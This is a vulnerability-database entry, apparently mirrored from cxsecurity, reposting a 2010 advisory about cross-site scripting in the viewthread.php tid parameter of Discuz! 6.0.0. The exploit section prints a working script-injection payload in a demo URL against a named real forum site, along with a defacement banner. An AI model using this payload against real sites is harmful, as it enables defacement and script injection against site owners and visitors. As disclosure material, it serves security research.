Discuz! 6.0.0 cross site scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051294 漏洞类型
发布时间 2010-01-28 更新时间 2010-01-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010010116
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Discuz! 6.0.0
# Download:
 http://www.comsenz.com/downloads/install/discuz
# Vendor: www.comsenz.com
# Author: s4r4d0
# mail: s4r4d0@yahoo.com
# Bug: Cross site scripting has benn found on viewthread.php file.
# Exploit: http://host/bbs/viewthread.php?tid=[Xss]
# Demo: http://www.socvista.com/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal
 Error</h1></marquee>
# Made in Brazil
# Team: Fatal Error